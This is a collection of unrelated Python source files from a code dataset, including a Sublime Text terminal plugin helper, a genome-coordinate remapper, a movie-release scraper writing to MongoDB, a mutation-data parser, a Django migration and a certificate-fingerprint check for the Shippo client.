141924 | import sublime
import sublime_plugin
import re
def panel_window(view):
for w in sublime.windows():
for panel in w.panels():
v = w.find_output_panel(panel.replace("output.", ""))
if v and v.id() == view.id():
return w
return None
def panel_is_visible(view):
window = panel_window(view)
if not window:
return False
active_panel = window.active_panel()
if not active_panel:
return False
active_view = window.find_output_panel(active_panel.replace("output.", ""))
return active_view == view
def view_is_visible(view):
window = view.window()
if not window:
return False
group, _ = window.get_view_index(view)
return window.active_view_in_group(group) == view
def view_size(view):
pixel_width, pixel_height = view.viewport_extent()
pixel_per_line = view.line_height()
pixel_per_char = view.em_width()
if pixel_per_line == 0 or pixel_per_char == 0:
return (0, 0)
settings = sublime.load_settings("Terminus.sublime-settings")
min_columns = settings.get("min_columns", 20)
max_columns = settings.get("max_columns", 500)
nb_columns = int(pixel_width / pixel_per_char) - 3
if nb_columns < min_columns:
nb_columns = min_columns
elif nb_columns > max_columns:
nb_columns = max_columns
nb_rows = int(pixel_height / pixel_per_line)
if nb_rows < 1:
nb_rows = 1
return (nb_rows, nb_columns)
class TerminusInsertCommand(sublime_plugin.TextCommand):
def run(self, edit, point, character):
self.view.insert(edit, point, character)
class TerminusTrimTrailingLinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
lastrow = view.rowcol(view.size())[0]
if not self.is_empty(lastrow):
view.insert(edit, view.size(), "\n")
lastrow = lastrow + 1
row = lastrow
while row >= 1:
if self.is_empty(row-1):
R = view.line(view.text_point(row, 0))
view.erase(edit, sublime.Region(R.a-1, R.b))
row = row-1
else:
if self.is_empty(row):
R = view.line(view.text_point(row, 0))
view.erase(edit, sublime.Region(R.a, R.b))
break
def is_empty(self, row):
view = self.view
return re.match(r"^\s*$", view.substr(view.line(view.text_point(row, 0))))
class TerminusNukeCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
view.replace(edit, sublime.Region(0, view.size()), "")
| StarcoderdataPython |
1793770 | # -*- coding: utf-8 -*-
import argparse
import ijson
import multiprocessing
import json
from os import linesep
from bisect import bisect_left
STOP_TOKEN = "<PASSWORD>!!!"
def file_writer(dest_filename, some_queue, some_stop_token):
"""Write JSON strings to a JSON list from a multiprocessing
queue to a file until the stop token is sent"""
is_start_of_json = True
with open(dest_filename, 'w') as dest_file:
dest_file.write("[")
while True:
line = some_queue.get()
if line == some_stop_token:
dest_file.write(linesep)
dest_file.write("]")
return
if is_start_of_json:
is_start_of_json = False
else:
dest_file.write(",")
dest_file.write(linesep)
dest_file.write(line)
def remap_genome_coordinate(coord, align_tuples, startpoints):
"""Given a tuple of chromosome alignment remappings,
remap a single coordinate"""
original_chromosome = coord["chromosome"]
# The bisect left function gives the nearest item in the array
# If the items are equal, in this case we want them to be part of
# The same mapping so we add 1
ind = bisect_left(startpoints, (coord["position"] + 1)) -1
if ind == -1:
#The coordinate is before the first chromosome
return None
chromosome_mapping = align_tuples[ind]
(source_start_point,
source_chromosome,
length,
new_start_point,
new_chromosome) = chromosome_mapping
if original_chromosome == source_chromosome:
bases_from_start = coord["position"] - source_start_point
# length of chromosome counts from 0 to (length -1)
within_range = bases_from_start < length
if bases_from_start >= 0 and within_range:
# The base from the coordinate is within range
coord["chromosome"] = new_chromosome
coord["position"] = new_start_point + bases_from_start
return coord
return None
def remap_reference_genome(alignment_file_path,
coordinate_file_path,
writer_queue):
"""Given the file path to an alignment file and the
file path to a coordinate file
write an output file which maps
the source genome coordinates to a new reference genome"""
with open(alignment_file_path, 'r') as align:
alignments = ijson.items(align, 'item')
align_tuples = [(item["source"]["start"],
item["source"]["chromosome"],
item["length"],
item["target"]["start"],
item["target"]["chromosome"])
for item in alignments]
align_tuples.sort(key=lambda tup: tup[0])
startpoints = [tup[0] for tup in align_tuples]
with open(coordinate_file_path, 'r') as coordfile:
coords = ijson.items(coordfile, 'item')
for index, coord in enumerate(coords):
data_dict = remap_genome_coordinate(coord, align_tuples, startpoints)
if data_dict is not None:
writer_queue.put(json.dumps(data_dict))
def get_writer_process_and_queue(output):
"""Returns a multiprocessing process to write to a
file and a queue to do the writing"""
queue = multiprocessing.Queue()
return (
multiprocessing.Process(
target=file_writer,
args=(
output,
queue,
STOP_TOKEN)),
queue)
def handle_command(alignfile, coordsfile, output):
"""Given alignfile, coordsfile and output file paths, remap a genome"""
writer_process, writer_queue = get_writer_process_and_queue(output)
writer_process.start()
remap_reference_genome(alignfile, coordsfile, writer_queue)
writer_queue.put(STOP_TOKEN)
writer_process.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("alignfile", help="Path to the alignment JSON file")
parser.add_argument("coordsfile", help="Path to the coordinates JSON file")
parser.add_argument("output", help="Path to the desired output file")
args = parser.parse_args()
handle_command(args.alignfile, args.coordsfile, args.output)
| StarcoderdataPython |
3288563 | <gh_stars>0
import requests
from bs4 import BeautifulSoup
from pymongo import MongoClient
client = MongoClient('localhost', 27017)
db = client.team9TestOne
# 여기 테스트
# 발매일 코드 데이터베이스에 저장하는 코드 따로만들기
movie_list = list(db.movies.find({}, {'_id': False}))
big_list = []
for movie in movie_list:
title = movie['title']
url = movie['url']
url = url.replace('basic', 'detail')
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get(url, headers=headers)
soup = BeautifulSoup(data.text, 'html.parser')
# detail url을 통해서 영화배우들 리스트를 가져온다 !! 꼭 detail url 아니여도 가능 코드복사때문에 이렇게된것입니다.
releases = soup.select('#content > div.article > div.wide_info_area > div.mv_info > p > span:nth-child(4) > a')
# content > div.article > div.wide_info_area > div.mv_info > p > span:nth-child(4) 4번이 개봉일
release_list = []
for release in releases:
release_list.append(release.text)
big_list.append(release_list)
# 데이터베이스에저장보다는 UPDATE 왜냐면 이코드를 한번에 크롤링해서 처리를 못해서 UPDATE를 한것이다
movies = list(db.movies.find({}, {'_id': False}))
for idx, movie in enumerate(movies):
title = movie['title']
# 저장되기전 ['2021' , '.05.26'] 이코드 처리해서 넣기
dispose = big_list[idx]
year = dispose[0]
month_day = dispose[1]
year_month_day = year+month_day
big_list[idx] = year_month_day
db.movies.update_one({'title': title}, {'$set': {'release': big_list[idx]}})
| StarcoderdataPython |
1642454 | <reponame>bmorledge-hampton19/mutperiod
# This script takes data from the Kucab et al. mutation compendium paper and converts it to
# a trinucleotide context bed file.
import os, subprocess
from benbiohelpers.TkWrappers.TkinterDialog import TkinterDialog, Selections
from benbiohelpers.DNA_SequenceHandling import reverseCompliment, isPurine
from mutperiodpy.helper_scripts.UsefulFileSystemFunctions import (getIsolatedParentDir, generateFilePath, getDataDirectory,
DataTypeStr, generateMetadata, getAcceptableChromosomes)
def parseKucabCompendium(kucabSubstitutionsFilePaths, genomeFilePath, nucPosFilePath, includeAllPAHs):
for kucabSubstitutionsFilePath in kucabSubstitutionsFilePaths:
print("\nWorking in:",os.path.basename(kucabSubstitutionsFilePath))
if not kucabSubstitutionsFilePath.endswith("final.txt"):
raise ValueError("Error: Expected input file from Kucab data which should end in \"final.txt\".")
# Prepare the output file path.
localRootDirectory = os.path.dirname(kucabSubstitutionsFilePath)
dataGroupName = getIsolatedParentDir(kucabSubstitutionsFilePath)
if includeAllPAHs:
outputDirectory = os.path.join(localRootDirectory,"all_PAHs")
dataGroupName += "_all_PAHs"
else:
dataGroupName += "_smoker_lung"
outputDirectory = os.path.join(localRootDirectory,"smoker_lung")
# Make sure the data directory exists.
if not os.path.exists(outputDirectory): os.mkdir(outputDirectory)
# Generate the output file path and metadata
outputTrinucBedFilePath = generateFilePath(directory = outputDirectory, dataGroup = dataGroupName,
context = "trinuc", dataType = DataTypeStr.mutations, fileExtension = ".bed")
generateMetadata(dataGroupName, getIsolatedParentDir(genomeFilePath), getIsolatedParentDir(nucPosFilePath),
os.path.join("..",os.path.basename(kucabSubstitutionsFilePath)), outputDirectory)
# Get the list of acceptable chromosomes
acceptableChromosomes = getAcceptableChromosomes(genomeFilePath)
# These are the designations for PAH mutation signatures, the ones related to tobacco smoke that we want to study.
PAHDesignations = ("MSM0.54","MSM0.26","MSM0.92","MSM0.2","MSM0.42","MSM0.74","MSM0.103"
"MSM0.14","MSM0.82","MSM0.130","MSM0.12","MSM0.132","MSM0.13","MSM0.96")
# These designations specifically mimic the indel signature in smokers' lung cancer tumors.
LungCancerSpecificDesignations = ("MSM0.26","MSM0.92","MSM0.2","MSM0.103","MSM0.14")
# Set the designations that will be used to collect data based on the input to the function.
if includeAllPAHs:
relevantDesignations = PAHDesignations
else: relevantDesignations = LungCancerSpecificDesignations
print("Reading data and writing to trinuc bed file...")
with open(kucabSubstitutionsFilePath, 'r') as kucabSubstitutionsFile:
with open(outputTrinucBedFilePath, 'w') as outputTrinucBedFile:
firstLineFlag = True
for line in kucabSubstitutionsFile:
# Skip the first line with headers.
if firstLineFlag:
firstLineFlag = False
continue
# The lines are separated by tabs. The relevant data have the following indices in a tab-separated list:
# 15: mutagen designation
# 4: Chromosome
# 5: Start Pos (1 base)
# 6: Reference base
# 7: Mutated base
# 13: pre-base context
# 14: post-base context
choppedUpLine = line.strip().split('\t')
# Skip the mutation if it does not belong to the relevant group.
if not choppedUpLine[15] in relevantDesignations: continue
# Compile the necessary information for the bed file.
chromosome = "chr" + choppedUpLine[4]
# Handle the weird chromsome formatting and then check for invalid chromosomes.
if chromosome == "chr23": chromosome = "chrX"
if chromosome == "chr24": chromosome = "chrY"
if not chromosome in acceptableChromosomes: continue
startPos1Base = choppedUpLine[5]
startPos0Base = str(int(startPos1Base)-1)
mutatedFrom = choppedUpLine[6]
mutatedTo = choppedUpLine[7]
trinucContext = ''.join((choppedUpLine[13],mutatedFrom,choppedUpLine[14]))
# If the mutated base is listed as arising from a purine, flip the mutation and the strand.
if isPurine(mutatedFrom):
mutation = reverseCompliment(mutatedFrom) + '>' + reverseCompliment(mutatedTo)
strand = '-'
trinucContext = reverseCompliment(trinucContext)
else:
mutation = mutatedFrom + '>' + mutatedTo
strand = '+'
# Write the information to the trinuc bed file.
outputTrinucBedFile.write('\t'.join((chromosome, startPos0Base, startPos1Base,
trinucContext, mutation, strand)) + '\n')
# Sort the output file.
print("Sorting output file...")
subprocess.run(("sort","-k1,1","-k2,2n",outputTrinucBedFilePath,"-o",outputTrinucBedFilePath), check = True)
if __name__ == "__main__":
#Create the Tkinter UI
dialog = TkinterDialog(workingDirectory=getDataDirectory())
dialog.createMultipleFileSelector("Kucab Substitutions File Paths:",0,"final.txt",("text files",".txt")) #NOTE: Weird file ending?
dialog.createFileSelector("Genome Fasta File:",1,("Fasta Files",".fa"))
dialog.createFileSelector("Strongly Positioned Nucleosome File:",2,("Bed Files",".bed"))
dialog.createCheckbox("Include all PAH Designations",3,0)
# Run the UI
dialog.mainloop()
# If no input was received (i.e. the UI was terminated prematurely), then quit!
if dialog.selections is None: quit()
# Get the user's input from the dialog.
selections: Selections = dialog.selections
kucabSubstitutionsFilePaths = list(selections.getFilePathGroups())[0]
genomeFilePath = list(selections.getIndividualFilePaths())[0]
nucPosFilePath = list(selections.getIndividualFilePaths())[1]
includeAllPAHs = list(selections.getToggleStates())[0]
parseKucabCompendium(kucabSubstitutionsFilePaths, genomeFilePath, nucPosFilePath, includeAllPAHs) | StarcoderdataPython |
3373042 | <reponame>malithbc/Mole-AR-Stage1
# Generated by Django 3.2.5 on 2021-07-28 06:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('playground', '0012_image_user_id'),
]
operations = [
migrations.AddField(
model_name='image',
name='object_3D',
field=models.ImageField(default='Object3D/obj', upload_to='Object3D/'),
preserve_default=False,
),
]
| StarcoderdataPython |
1615294 | <gh_stars>0
import hashlib
from shippo.error import APIError
BLACKLISTED_DIGESTS = {
}
def verify(hostname, certificate):
"""Verifies a PEM encoded certficate against a blacklist of known revoked
fingerprints.
returns True on success, raises RuntimeError on failure.
"""
if hostname not in BLACKLISTED_DIGESTS:
return True
sha = hashlib.sha1()
sha.update(certificate)
fingerprint = sha.hexdigest()
if fingerprint in BLACKLISTED_DIGESTS[hostname]:
raise APIError("Invalid server certificate. You tried to "
"connect to a server that has a revoked "
"SSL certificate, which means we cannot "
"securely send data to that server. "
"Please email <EMAIL> if you "
"need help connecting to the correct API "
"server.")
return True
| StarcoderdataPython |
Subsets and Splits